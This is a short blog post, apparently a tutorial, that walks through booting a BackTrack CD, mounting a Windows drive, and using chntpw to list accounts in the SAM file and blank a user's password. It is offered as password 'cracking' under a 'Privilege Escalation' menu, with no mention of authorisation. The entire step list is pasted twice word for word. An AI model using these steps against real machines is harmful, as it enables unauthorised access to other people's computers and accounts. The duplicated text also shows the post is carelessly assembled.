Before beginning you should know what is hash and how and where the passwords are stored as hash in windows.
For cracking windows password using Backtrack you should have a Backtrack cd. Insert cd boot to cd. Now Backtrack have many offline password cracking tools pre-installed, we will use one of them.
From tool we have to create a directory to which we have to mount the SAM file that is in system32/config.
Continue using following steps:
step 1 open applications>Bactrack>Privilege Escalation>Password Hacks>Offline Attacks>chntpw
step 2 type fdisk -l
step 3 type mkdir /mnt/apple
step 4 type mount -t ntfs-3g /dev/sda1 /mnt/apple
step 5 type ./chntpw -l /mnt/apple/WINDOWS/system32/config/SAM
step 6 type ./chntpw /mnt/apple/WINDOWS/system32/config/SAM
step 7 after you have the user edit menu select the appropriate step, here we have to clear password so type 1 and press enter
step 8 now it will ask for writing hive files so type y and press enter
For cracking windows password using Backtrack you should have a Backtrack cd. Insert cd boot to cd. Now Backtrack have many offline password cracking tools pre-installed, we will use one of them.
From tool we have to create a directory to which we have to mount the SAM file that is in system32/config.
Continue using following steps:
step 1 open applications>Bactrack>Privilege Escalation>Password Hacks>Offline Attacks>chntpw
step 2 type fdisk -l
step 3 type mkdir /mnt/apple
step 4 type mount -t ntfs-3g /dev/sda1 /mnt/apple
step 5 type ./chntpw -l /mnt/apple/WINDOWS/system32/config/SAM
step 6 type ./chntpw /mnt/apple/WINDOWS/system32/config/SAM
step 7 after you have the user edit menu select the appropriate step, here we have to clear password so type 1 and press enter
step 8 now it will ask for writing hive files so type y and press enter
No comments:
Post a Comment